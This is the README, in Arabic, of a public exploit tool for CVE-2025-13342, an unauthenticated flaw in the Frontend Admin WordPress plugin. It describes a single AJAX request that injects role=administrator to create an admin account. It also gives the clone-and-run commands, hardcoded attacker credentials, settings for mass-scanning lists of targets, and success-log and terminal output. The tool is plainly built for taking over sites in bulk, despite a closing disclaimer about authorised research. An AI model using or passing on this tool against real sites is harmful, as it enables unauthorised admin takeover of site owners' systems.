
Frontend Admin من DynamiApps <= 3.28.20 - تحديث تعسفي للخيارات دون مصادقة
Frontend Admin من DynamiApps <= 3.28.20 - تحديث خيارات عشوائي بدون مصادقة
__ __ _ _ _ ___ ,________ _
/ ()(| |_// () / )/ \/ )|__ /| __/ __/| |/ )
| | | >- ----/| |/ \----| \ \|__|_/
\___/ \/ \___/ /__\_//__\__/ |\__/\__/ |/__
| الحقل | التفاصيل |
|---|---|
| CVE ID | CVE-2025-13342 |
| النتيجة | 9.8 حرجة — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CNA | Wordfence |
| الإصدارات المتأثرة | Frontend Admin من DynamiApps ≤ 3.28.20 |
| المصادقة | لا شيء — بدون مصادقة بالكامل |
| النوع | فحص صلاحيات غير كافٍ + التحقق من المدخلات → كتابة خيارات عشوائية |
| CWE | CWE-284 · تحكم غير سليم في الوصول |
ماذا يحدث:
معالج الحفظ ActionOptions::run() لا يتحقق من صلاحيات المستخدم ولا يتحقق من المدخلات قبل الكتابة إلى wp_options. يصبح نموذج ACF الأمامي العام قناة كتابة مفتوحة. يضبط المهاجم users_can_register=1 و default_role=administrator، ثم يسجّل حسابًا جديدًا يحصل تلقائيًا على دور المشرف.
تتخطى هذه الأداة ذلك الأسلوب ذا الخطوتين — فهي ترسل مباشرة حمولة النموذج المصمّمة مع حقن role=administrator في حقول إنشاء المستخدم عبر acff[user][field_*]، لإنشاء حساب مشرف في استدعاء AJAX واحد.
1. Crawl common registration paths → locate ACF frontend form
2. Parse hidden fields → _acf_nonce, _acf_form
3. Map user fields → username · email · password · role
4. POST /wp-admin/admin-ajax.php
action=frontend_admin/form_submit
acff[user][<role_field>] = administrator
5. {"success":true} → admin account created
6. Log to acf_success.txt
requests
beautifulsoup4
colorama
rich
pip install requests beautifulsoup4 colorama rich
git clone https://github.com/Nxploited/CVE-2025-13342.git
cd CVE-2025-13342
pip install -r requirements.txt
python3 CVE-2025-13342.py
الأداة تفاعلية. سيُطرح عليك أربعة أسئلة:
Targets file path → list.txt
Threads → 10
Timeout (seconds) → 10
Verbose debug → y / N
بيانات الاعتماد محددة داخليًا:
| الحقل | القيمة |
|---|---|
| اسم المستخدم | Nxadmin1 |
| البريد الإلكتروني | [email protected] |
| كلمة المرور | NxAdmin_1337#KSA |
مضيف واحد في كل سطر — البروتوكول اختياري:
https://target1.com
target2.com
http://target3.com
تفحص الأداة 28 مسارًا لكل هدف بالترتيب، وتتوقف عند أول نموذج ACF صالح:
/ /register/ /registration/ /signup/ /sign-up/
/user-registration/ /account/ /my-account/
/frontend-form/ /frontend-register/ ...
| الملف | المحتوى |
|---|---|
acf_success.txt | تأكيد إنشاء حسابات مشرف ناجحة |
الصيغة:
[2025-06-01 14:30:22] BASE=https://target.com FORM=https://target.com/register/
USER=Nxadmin1 [email protected] PASS=NxAdmin_1337#KSA JSON={"success":true,...}
الطرفية:
[+] Target base: https://target.com
[+] Found form at: https://target.com/register/
_acf_nonce: a1b2c3d4e5
_acf_form: 123
[+] SUCCESS: https://target.com
[-] No suitable ACF Frontend form found on ...
[-] FAILED: https://target2.com
| المؤلف | Nxploited (Khaled Alenazi) |
| GitHub | github.com/Nxploited |
| Telegram | @KNxploited |
هذه الأداة مقدمة لأغراض البحث الأمني المصرح به والتعليم فقط.
لا يتحمل المؤلف أي مسؤولية عن أي استخدام ضد أنظمة دون إذن كتابي صريح من المالك.
الوصول غير المصرح به غير قانوني بموجب CFAA وCMA والقوانين المكافئة حول العالم.
أنت وحدك المسؤول عن أفعالك.